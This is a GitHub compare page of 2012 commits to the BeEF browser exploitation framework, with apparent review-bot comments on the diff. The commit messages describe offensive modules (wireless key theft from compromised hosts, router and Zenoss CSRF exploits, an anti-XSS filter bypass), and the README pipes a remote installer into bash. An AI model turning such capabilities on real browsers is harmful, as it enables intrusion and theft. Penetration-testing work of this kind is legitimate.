Compare commits


121 Commits

Author SHA1 Message Date
Keith Lee
e528375e3d Save wireless configuration xml created by Get_wireless_keys module to temp folder 2012-04-02 14:40:32 -04:00
antisnatchor
1db9ccaff6 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-31 14:12:52 +01:00
antisnatchor
2db4885c2f Added comments in the main Router class. 2012-03-31 13:57:18 +01:00
antisnatchor
5474f0507a Allowing also GET method on Access-Control-Allow-Methods (dynamic handler). 2012-03-31 13:27:59 +01:00
antisnatchor
59ac216b71 Added basic web-server imitation (overriding Server response headers, added config.yaml options). 2012-03-31 13:24:30 +01:00
antisnatchor
addc256b8c Remove route "/" from the main router class. Must return 'not found' anyway. 2012-03-29 15:00:20 +02:00
antisnatchor
b88acd98c8 Added BeEF router superclass: it will be extended by other classes when sub-routes are needed. 2012-03-29 14:24:15 +02:00
bcoles
2bca21a41d Minor updates to XSSRays
Part of issue #47
2012-03-26 16:29:15 +10:30
bcoles
8518c8fae9 Renamed History Extraction module to Get Visited Domains
Added 4 links for Firefox
2012-03-26 14:44:36 +10:30
bcoles
b230b98336 Changed BeEF::API.registered?() to use the :is_matched_params method
Fixes issue #500
2012-03-25 14:13:44 +10:30
antisnatchor
e4a7019192 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-24 18:43:57 +01:00
bcoles
45475d625b Updated IE version detection
No longer modifies the DOM for every call to:
	`isIE8()`
	`isIE9()`
	`isIE()`
2012-03-22 19:27:36 +10:30
antisnatchor
f0fab1c431 Added rest-client gem dependency when running tests 2012-03-16 11:12:10 +01:00
bcoles
5329d5c147 Added support for Firefox 11 2012-03-16 13:11:20 +10:30
bcoles
e52779e72e Fixed javaEnabled() in BeEF hook
- It was breaking the hook in IE6

Also fixed a couple of typos in the Local File Theft module description
2012-03-16 12:40:13 +10:30
antisnatchor
5e2de7d378 reverted http.debug to false 2012-03-15 18:37:53 +01:00
Michele Orru
11fbeb3296 Merge pull request #643 from antisnatchor/master
RESTful API, from antisnatchor with love :D
2012-03-15 10:33:17 -07:00
antisnatchor
99fff273fe removed old reference to dynamic_module table 2012-03-15 13:58:37 +01:00
antisnatchor
61efe56b10 Removed classes and requires of dynamic* tables. Not used anymore. 2012-03-15 13:56:48 +01:00
antisnatchor
4e224e63ee added example on how to call metasploit modules with the REST api 2012-03-15 13:53:29 +01:00
antisnatchor
5c96fe2b84 changed return value on override_execute, reformatted code for the metasploit api 2012-03-15 13:32:10 +01:00
Christian Frichot
6541d9fa34 Tidied up some of the Console Shell output handling - Issue #642 2012-03-15 19:52:03 +08:00
Christian Frichot
2bc6a0d8a9 Rick roll module, changed to a different YouTube vid, that appears to work here. Issue #620 2012-03-15 19:43:02 +08:00
Christian Frichot
4f1042a6a3 QRCode extension - minor update to handle the Console in the Core - Issue #641 2012-03-15 19:39:24 +08:00
antisnatchor
8db7ef00b4 Fixed error when attaching to MSF (resetdb? is not there anymore) 2012-03-15 12:25:38 +01:00
antisnatchor
fec922a63c Implemented /api/modules/ to retrieve all enabled modules 2012-03-14 16:52:25 +01:00
antisnatchor
8fdd127f17 Disabled Sinatra exception, and set the custom 404 response to 'not found.' 2012-03-14 16:26:29 +01:00
Graziano Felline
b02bdbaaa7 ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:41:10 +01:00
Graziano Felline
8795c5770a ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:34:46 +01:00
antisnatchor
c3a611d12e Implemented info/options retrieval for a specific module through the REST API 2012-03-13 17:18:13 +01:00
antisnatchor
434f9f8e43 Now it's possible to launch command modules via the REST api (also with options), and then get execution results. 2012-03-13 12:43:10 +01:00
antisnatchor
837c1f2db8 Modified BeEF::Module.execute to return the command_id of the persisted command, instead of just returning a boolean. Refactored usages in the code as well. 2012-03-13 12:40:28 +01:00
antisnatchor
3674f06609 Implemented /api/logs and /api/logs/hb_session, added code comments 2012-03-12 17:40:38 +01:00
antisnatchor
818f3d207e Retrieving correct browser version with browserDetails BrowserVersion 2012-03-12 17:14:09 +01:00
bcoles
b11502cc84 Added BT Home Hub CSRF module 2012-03-13 00:54:25 +10:30
bcoles
f38c7e5615 Removed "HasJava" from hook initialization
Updated Get Wireless Keys module description
2012-03-13 00:50:03 +10:30
bcoles
6ef889b0b1 Removed Java from hook initialization:
- Removed has_java
	- Removed internal_ip
	- Removed internal_hostname

Added function `beef.browser.javaEnabled()`

Patched function `beef.browser.hasJava()`
	- should no longer break the hook in Chrome/Safari

Added `not_working` browsers to History Extraction module
2012-03-13 00:19:01 +10:30
antisnatchor
4429ab3df2 Added /api/hooks logic to retrieve online and offline HBs as json 2012-03-12 12:46:04 +01:00
antisnatchor
03cd06a014 Added stubs and registered classes for the 3 main RESTful API endpoints: hooks, modules, logs 2012-03-12 11:55:26 +01:00
antisnatchor
872272645e Added api_token for RESTful api authentication 2012-03-12 10:27:03 +01:00
bcoles
9735a7b66f Merge branch 'master' of https://github.com/beefproject/beef 2012-03-12 11:41:08 +10:30
milo2012
51d6aaa515 Merge remote-tracking branch 'origin/master' 2012-03-12 00:53:07 +08:00
milo2012
5cb1ad3d53 Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems 2012-03-12 00:50:02 +08:00
milo2012
daa37293fe Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:57:19 -04:00
root
847b798e0a Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:40:10 -04:00
antisnatchor
7dab21ff7f First skeleton for the RESTful api using Sinatra (modular approach, not classic one). 2012-03-11 16:12:59 +01:00
antisnatchor
e1652bf52e Added sinatra dependency to bundler Gemfile 2012-03-11 10:51:43 +01:00
radoen
a0c11fa695 Added support to intercept dynamic requests 2012-03-11 10:26:56 +01:00
Keith Lee
f2401d3f39 Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. 2012-03-11 10:26:56 +01:00
asaafan
76e881dce9 Delete Skype XSS stub from main branch 2012-03-11 10:26:56 +01:00
unknown
ea199f5c55 Adding stub for Skype XSS module 2012-03-11 10:26:56 +01:00
asaafan
05b7eab56c Delete Skype XSS stub from main branch 2012-03-09 01:46:11 +02:00
bcoles
11870710e8 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-08 20:28:38 +01:00
unknown
dbd6baa7b0 Temporary fix to prevent hook error on Safari. I will implement a final fix tomorrow. 2012-03-07 16:19:06 +01:00
bcoles
c1975691f4 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-07 15:02:12 +10:30
antisnatchor
8c3afcf2b9 Minor changes related to Java detection with the unsigned applet: if the browser is Chrome, we simply rely on window.navigator. 2012-03-06 19:56:58 +01:00
Michele Orru
03604a7e93 Merge pull request #632 from milo2012/master
Fixes Issue 567: if browser != Chrome, an unsigned java applet is injected in the DOM to verify if Java is really enabled and working.
2012-03-06 10:44:34 -08:00
Keith Lee
cc9756cf59 Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:46:51 +08:00
Keith Lee
97672966df Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:41:27 +08:00
Saafan
3bd06ebf82 Merge pull request #631 from asaafan/master
Testing Fork/Merge
2012-03-05 07:51:04 -08:00
Saafan
c1ad9d7b04 Testing fork/merge 2012-03-05 17:47:14 +02:00
Michele Orru
2796e384b3 Merge pull request #630 from milo2012/master
changes to command.rb and commands.rb so that @datastore['cid'], @datastore['results'] and @datastore['beefhook'] can be called from the modules
2012-03-05 01:37:19 -08:00
Keith Lee
95f7e92011 Changes to command module and get_physical location so that @datastore['cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules 2012-03-05 03:40:46 +08:00
antisnatchor
698e01bb83 reverted back test_contants definition. 2012-03-04 16:36:08 +01:00
antisnatchor
08d50512e9 Added bootstrap unit tests. 2012-03-04 16:22:37 +01:00
antisnatchor
e9a6049e58 Fixes issue 621: Added 2 new command line options. Now it's possible to specify a different config.yaml file. Also changed the core load order, adding a new bootstrap module. 2012-03-04 14:55:03 +01:00
Wade Alcorn
3f06f6db18 Commented yaml bug fix 2012-03-04 22:12:04 +10:00
Wade Alcorn
487227b945 Version updated 2012-03-04 22:11:21 +10:00
Wade Alcorn
6c7624805c Update delay to test jenkins 2012-03-04 21:46:03 +10:00
bcoles
753299e758 Updated Get Page HTML module:
o Now returns head and body in one beef.send() request
o Now stores results correctly
2012-03-04 20:24:04 +10:30
bcoles
0485a1ab7e Added 3x router CSRF exploits:
o Comtrend CT5367
o Comtrend CT5624
o D-Link DSL500T
2012-03-04 14:55:00 +10:30
Christian Frichot
52d06e40a2 Removed the dev/null output in the Rake Install task Issue #629 2012-03-03 22:44:05 +08:00
bcoles
5c678a2550 Added cleanup() function to router exploits
Removed `username:password@` portion of example target URLs as
unfortunately this triggers warnings in most modern browsers. The
modules target CSRF vulnerabilities and it's expected and
acceptable behaviour to rely on the user having an authorized session by
default.

"Advanced users" will be familiar with the `username:password@` trick
and can add it to the URL if they desire.
2012-03-03 20:43:56 +10:30
Christian Frichot
63805d943d The Console Shell now allows you to drop into an IRB (and then play with the BeEF object if you want) Issue #627 2012-03-03 14:59:59 +08:00
Ben Waugh
302bb27212 Revert 041ed2b47a27655cad360397b6ca43401a027504^..HEAD 2012-02-28 09:01:29 +10:00
Ben Waugh
041ed2b47a Jenkins Test Change 2012-02-28 07:32:02 +10:00
Wade Alcorn
df0458d62e Merge branch 'master' of github.com:beefproject/beef 2012-02-26 21:35:25 +10:00
Wade Alcorn
275bbfaad2 Updates to test jenkins 2012-02-26 21:35:03 +10:00
antisnatchor
e7dd04977e Added getPhysicalLocation module written by @keith55. Adjusted config.yaml description and browser support. 2012-02-26 09:53:16 +01:00
bcoles
b6ce0cf611 Updated Detect Firebug module description 2012-02-22 20:10:38 +10:30
bcoles
fd7cee3c5c Fixed typo in logger unit test 2012-02-22 19:07:07 +10:30
bcoles
b52c3d7d19 Added unit test stubs for proxy, requester and event logger extensions.
Fixes issue #29
Fixes issue #30
Fixes issue #33

Created a unit test stub for logger (as opposed to event_logger) to
differentiate between the main Logs tab and the event logs for each
zombie.
2012-02-22 19:00:48 +10:30
Wade Alcorn
ec48e2647f Minor update to trigger test server 2012-02-21 06:08:15 +10:00
Wade Alcorn
5118429cb5 Overkill test for test server 2012-02-20 21:02:46 +10:00
Wade Alcorn
d010bd6d9e Extend wait time between login tests 2012-02-20 17:46:12 +10:00
bcoles
cda1659356 Improved proxy error handling. Fixes issue #92.
The proxy now dies somewhat gracefully when given a malformed request.

The `Content-Length' header is now only matched by the parser if its
value is an integer.

A request with a null or missing HTTP version in the header now defaults
to HTTP/1.0

A request with a null or missing `Host' header returns:
  `ERROR: CrossDomain Request. The request was not sent.'
regardless of whether the host is specified in the URL.
2012-02-19 03:42:20 +10:30
bcoles
d50b07ac56 Added Unhook module. Fixes issue #525. 2012-02-18 19:10:02 +10:30
bcoles
a9e276f50a Added Detect Firebug module. Fixes issue 497
Moved Detect Software module from Browser to Host category
2012-02-18 17:43:20 +10:30
Christian Frichot
791b34863e Renamed / tidied up some of the config. See Issue #82 2012-02-18 10:06:47 +08:00
Mike Haworth
fd15c108a2 Merge branch 'master' of github.com:beefproject/beef 2012-02-18 14:17:34 +13:00
Mike Haworth
5e138395d4 Partial fix for issue #100, now detects build version of flash 2012-02-18 14:17:12 +13:00
Christian Frichot
15932efcb3 Made some minor adjustments to 'os' key rating in core/module.rb. See issue #72 2012-02-18 09:06:46 +08:00
Mike Haworth
106e2dbd2d added detect software module 2012-02-18 12:22:17 +13:00
Wade Alcorn
56a9c4d04d Changed version number 2012-02-16 20:30:48 +10:00
Wade Alcorn
55b80d3b6d Merge branch 'master' of github.com:beefproject/beef 2012-02-16 08:23:39 +10:00
bcoles
8ecfa3578f Merge branch 'master' of https://github.com/beefproject/beef 2012-02-16 02:52:38 +10:30
antisnatchor
2715e0400c added browser type, version and OS to console output when a new browser is hooked in BeEF 2012-02-15 16:01:47 +01:00
Ben
667d00351d Updated README instructions for MAC OS X 2012-02-15 16:01:46 +01:00
Ben
3ad2dbb3c7 Rake task to generate DMG image 2012-02-15 16:01:46 +01:00
antisnatchor
5bc6745e03 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-15 16:01:46 +01:00
antisnatchor
58f2b4f7a1 Added detection of Chrome 17 2012-02-15 16:01:45 +01:00
bcoles
e5aa0671a1 Removed "notes:" node from three module config.yaml files 2012-02-15 16:01:45 +01:00
Christian Frichot
4a92d3174c Removed extended_in_modules code. See Issue #147 2012-02-15 16:01:45 +01:00
antisnatchor
61763ff103 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-15 16:01:45 +01:00
Saafan
e8d7293350 Listening to loopback only. Fixes issue #594 2012-02-15 16:01:44 +01:00
bcoles
805e8c8af1 Added fingerprints to Fingerprint Network module 2012-02-15 16:01:44 +01:00
Wade Alcorn
1d7ad568d2 Minor formatting update 2012-02-15 16:01:44 +01:00
antisnatchor
9489e3c591 moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. 2012-02-15 16:01:43 +01:00
antisnatchor
d9104b93f4 removed console.log function calls that were throwing errors on IE 2012-02-15 16:01:23 +01:00
antisnatchor
55b52427e8 re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel 2012-02-15 16:00:57 +01:00
antisnatchor
1d74d7eeab Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. 2012-02-15 16:00:38 +01:00
antisnatchor
74d176ff73 Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. 2012-02-15 16:00:14 +01:00
Ben
def8677f1c Updated README instructions for MAC OS X 2012-02-15 17:52:54 +10:00
Ben
02bed661bb Rake task to generate DMG image 2012-02-15 17:52:08 +10:00
antisnatchor
c6988befc5 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-12 13:45:35 +01:00
antisnatchor
aefd251c17 Added detection of Chrome 17 2012-02-12 11:49:38 +01:00
bcoles
591cef0732 Removed "notes:" node from three module config.yaml files 2012-02-09 23:01:14 +10:30
Christian Frichot
0178a41676 Removed extended_in_modules code. See Issue #147 2012-02-07 21:24:02 +08:00
antisnatchor
476c2d0636 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-07 02:03:34 +01:00
Saafan
f20fd9e797 Listening to loopback only. Fixes issue #594 2012-02-06 12:00:08 +02:00
bcoles
ec0dacce28 Added fingerprints to Fingerprint Network module 2012-02-01 23:11:05 +10:30
161 changed files with 3625 additions and 1025 deletions

.gitignore

@@ -1,2 +1,3 @@
beef.db
test/msf-test
custom-config.yaml


@@ -25,6 +25,7 @@ else
end
gem "thin"
gem "sinatra", "1.3.2"
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
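Review bot: `gem "sinatra", "1.3.2"` is pinned to an exact version while every other gem in this block floats; if the exact pin is deliberate (the new REST handlers depend on the 1.3.x modular API), add a short comment saying so, otherwise a pessimistic constraint such as `"~> 1.3.2"` would match the style of the `rest-client` line added further down in this file.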
@@ -48,6 +49,8 @@ if ENV['BEEF_TEST']
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
#RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
end
source "http://rubygems.org"
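Review bot: the comment on the line before `gem "rest-client", "~> 1.6.7"` is missing the space after `#` that the neighbouring `# sudo apt-get ...` comments use. Separately, the `source "http://rubygems.org"` context line fetches gems over plain HTTP; switching it to `https://rubygems.org` is a cheap follow-up that removes a dependency-tampering window during `bundle install`.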


@@ -1,52 +0,0 @@
GEM
remote: http://rubygems.org/
specs:
addressable (2.2.6)
ansi (1.4.1)
daemons (1.1.5)
data_objects (0.10.7)
addressable (~> 2.1)
dm-core (1.2.0)
addressable (~> 2.2.6)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.7)
data_objects (= 0.10.7)
erubis (2.7.0)
eventmachine (0.12.10)
json (1.6.4)
librex (0.0.52)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.4.6)
parseconfig (0.5.2)
rack (1.4.0)
term-ansicolor (1.0.7)
thin (1.3.1)
daemons (>= 1.0.9)
eventmachine (>= 0.12.6)
rack (>= 1.0.0)
PLATFORMS
ruby
DEPENDENCIES
ansi
data_objects
dm-core
dm-migrations
dm-sqlite-adapter
erubis
eventmachine (= 0.12.10)
json
msfrpc-client
parseconfig
term-ansicolor
thin
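Review bot: deleting Gemfile.lock wholesale gives up reproducible dependency resolution: every `bundle install` now resolves the newest gems that satisfy the Gemfile, so versions recorded here such as `eventmachine (= 0.12.10)` and the `dm-*` set can drift between developers and the Jenkins box this series is wiring up. If the lock is dropped on purpose because the test and MSF setups need different resolutions, say so in the commit message and add `Gemfile.lock` to `.gitignore` (the .gitignore hunk above only adds `custom-config.yaml`); otherwise keep the lock and regenerate it.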

README

@@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th
4. Prerequisites (Mac OSX)
Make sure you have XCode installed - which provided the sqlite support BeEF needs
Sqlite support is native in MacOS 10.6+
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p0 --with-gcc=clang
$ rvm use 1.9.3
5. Install instructions
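Review bot: the RVM install line runs two commands concatenated: `source ~/.bash_profile` has been joined onto the end of `$ bash -s stable < <(curl -s ...)`, where bash will take `source` and `~/.bash_profile` as positional parameters of the installer rather than running them afterwards; put `source ~/.bash_profile` on its own `$` line. Also `which provided the sqlite support` should read `provides`, and that sentence duplicates the `- XCode: provides the sqlite support BeEF needs` bullet right below it, so keep one. Since the line pipes a remote script straight into bash, it is worth telling readers to download and inspect the installer first.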


@@ -56,7 +56,7 @@ task :msf => ["install", "msf_install"] do
end
task :install do
sh "export BEEF_TEST=true;bundle install > /dev/null"
sh "export BEEF_TEST=true;bundle install"
end
################################
@@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end
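Review bot: the `dmg` task is not re-runnable: `sh "mkdir dmg"` fails if a previous run left the directory behind (for example when `hdiutil` aborted before the `sh "rm -r dmg"` cleanup ran), even though `-ov` on the `hdiutil create` line shows that overwriting is expected. Use `mkdir -p` (or Rake's `mkdir_p` / `rm_rf` helpers) and run the cleanup in an `ensure` block so a failed build does not poison the next one. The trailing semicolons on the `puts` and `sh` lines are unneeded in Ruby, and `rsync *` skips dotfiles, which is probably what you want for a distributable image but deserves a comment.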


@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.1-alpha
0.4.3.3-alpha

beef

@@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9'
puts "\n"
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See Readme"
puts "\n"
exit
end
@@ -41,15 +41,26 @@ end
# @note Require core loader's
require 'core/loader'
# @note Starts configuration system
config = BeEF::Core::Configuration.instance
# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
require 'core/bootstrap'
# @note Loads enabled extensions
BeEF::Extensions.load
# @note Prints the BeEF ascii art if the -a flag was passed
if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Prints BeEF welcome message
#BeEF::Extension::Console::Banners.print_ascii_art
BeEF::Extension::Console::Banners.print_welcome_msg
BeEF::Core::Console::Banners.print_welcome_msg
# @note Loads enabled modules
BeEF::Modules.load
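Review bot: `BeEF::Core::Console::CommandLine.parse` is called three times in this hunk (twice for `:ext_config`, once for `:ascii_art`) and again for `:resetdb` in the next one; parse once into a local, e.g. `opts = BeEF::Core::Console::CommandLine.parse`, and read the keys from it, otherwise ARGV is reparsed on every call and any future option with side effects runs repeatedly. The external config path is also built as `"#{$root_dir}/#{...[:ext_config]}"`, which means an absolute path given with `-c` is silently turned into a path under `$root_dir`; `File.expand_path(opts[:ext_config], $root_dir)` handles both relative and absolute values.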
@@ -75,8 +86,7 @@ case config.get("beef.database.driver")
end
# @note Resets the database if the -x flag was passed
# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
if BeEF::Extension::Console.resetdb?
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
DataMapper.auto_migrate!
else
@@ -94,10 +104,13 @@ http_hook_server = BeEF::Core::Server.instance
http_hook_server.prepare
# @note Prints information back to the user before running the server
BeEF::Extension::Console::Banners.print_loaded_extensions
BeEF::Extension::Console::Banners.print_loaded_modules
BeEF::Extension::Console::Banners.print_network_interfaces_count
BeEF::Extension::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
#@note Prints the API key needed to use the RESTful API
print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
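Review bot: `print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"` writes the API token to standard output, so it lands in any captured console output, including the Jenkins logs this branch is setting up; consider printing it only when not running under the test harness, or printing a masked form and exposing the full token through the config or UI. Style: `BeEF::Core::Crypto::api_token` uses `::` for a method call while the rest of this file uses `.`.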


@@ -16,14 +16,14 @@
# BeEF Configuration file
beef:
version: '0.4.3.1-alpha'
version: '0.4.3.3-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet = "127.0.0.1/32"
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
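Review bot: the comment fix from `permitted_ui_subnet = "127.0.0.1/32"` to `permitted_ui_subnet: "127.0.0.1/32"` makes the example valid YAML, but the live default under it is still `permitted_ui_subnet: "0.0.0.0/0"`, which admits the admin UI from any address the server binds on. Given that this same series restricts the listener to loopback (`Listening to loopback only. Fixes issue #594`), shipping the loopback subnet as the default and moving the open one into the comment would match that intent.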
@@ -37,6 +37,11 @@ beef:
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
#supported: apache, iis
type: "apache"
database:
# For information on using other databases please read the
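Review bot: `web_server_imitation.type` takes free text but the only documented values are in the `#supported: apache, iis` comment; document, or validate at load time, what happens with an unsupported value so that a typo does not silently fall back to the stock `Server` header. The comment also lacks the space after `#` used elsewhere in this file.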


@@ -60,10 +60,9 @@ module BeEF
# @param [String] method the method of the class
# @param [Array] params an array of parameters that need to be matched
# @return [Boolean] whether or not the owner is registered
# @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
def registered?(owner, c, method, params = [])
@registry.each{|r|
if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
return true
end
}
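Review bot: the `@todo Change the param matching to use the new :is_matched_params?() method - Issue #479` line is now stale, since this hunk does exactly that by replacing `params == r['params']` with `self.is_matched_params?(r, params)`; drop the `@todo` in the same change. Style: `and` binds more loosely than `&&`; it works here, but `&&` is the idiom for boolean conditions and avoids surprises if the condition is ever assigned.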

core/bootstrap.rb (new file)

@@ -0,0 +1,53 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
end
end
## @note Include the BeEF router
require 'core/main/router/router'
require 'core/main/router/api'
## @note Include http server functions for beef
require 'core/main/server'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'
## @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/api'
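Review bot: the new file mixes `## @note` and `# @note` comment prefixes (compare `## @note Include the BeEF router` with `# @note Include the network stack`); pick one so the doc generator treats them alike. The empty `module BeEF` / `module Core` declaration at the top carries no code; a one-line comment that it only reserves the namespace before the requires would save the next reader a question.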


@@ -26,9 +26,6 @@ require 'core/main/models/hookedbrowser'
require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/dynamiccommandinfo'
require 'core/main/models/dynamicpayloadinfo'
require 'core/main/models/dynamicpayloads'
require 'core/main/models/optioncache'
# @note Include the constants
@@ -44,20 +41,8 @@ require 'core/main/crypto'
require 'core/main/logger'
require 'core/main/migration'
# @note Include http server functions for beef
require 'core/main/server'
# @note Include the command line parser and the banner printer
require 'core/main/console/commandline'
require 'core/main/console/banners'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'


@@ -38,11 +38,4 @@ require 'core/api'
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
# @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
require 'core/core'
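Review bot: after this hunk `require 'core/core'` appears twice, once above the removed helper block and again as the last line; `require` is idempotent so it is harmless, but the second copy is redundant now that the helpers moved to core/bootstrap.rb and should go.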


@@ -48,9 +48,8 @@ beef.browser = {
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function() {
$j("body").append('<!--[if IE 8]> <div id="beefiecheck" class="ie ie8"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie8'))?true:false;
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
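Review bot: the new `isIE8` swaps the DOM write for a seven-term feature-sniffing chain (`!!window.XMLHttpRequest && !window.chrome && ... && !window.performance`), which will be fragile as other engines gain or lose these objects. IE8 and later expose `document.documentMode` as a number, so `return document.documentMode === 8;` (plus a `window.XDomainRequest` guard if you want to rule out non-IE engines) is shorter and easier to reason about; note in the comment that it reflects the document mode rather than the installed version, if that distinction matters to callers.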
@@ -58,8 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
$j("body").append('<!--[if IE 9]> <div id="beefiecheck" class="ie ie9"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie9'))?true:false;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**
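Review bot: this `isIE9` body is identical to the new `isIE8` body except for the final term (`!!window.performance` here versus `!window.performance` there); factor the shared prefix into one helper so a future tweak lands in both places, and add a comment naming `window.performance` as the feature that separates IE9 from IE8.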
@@ -158,12 +156,28 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
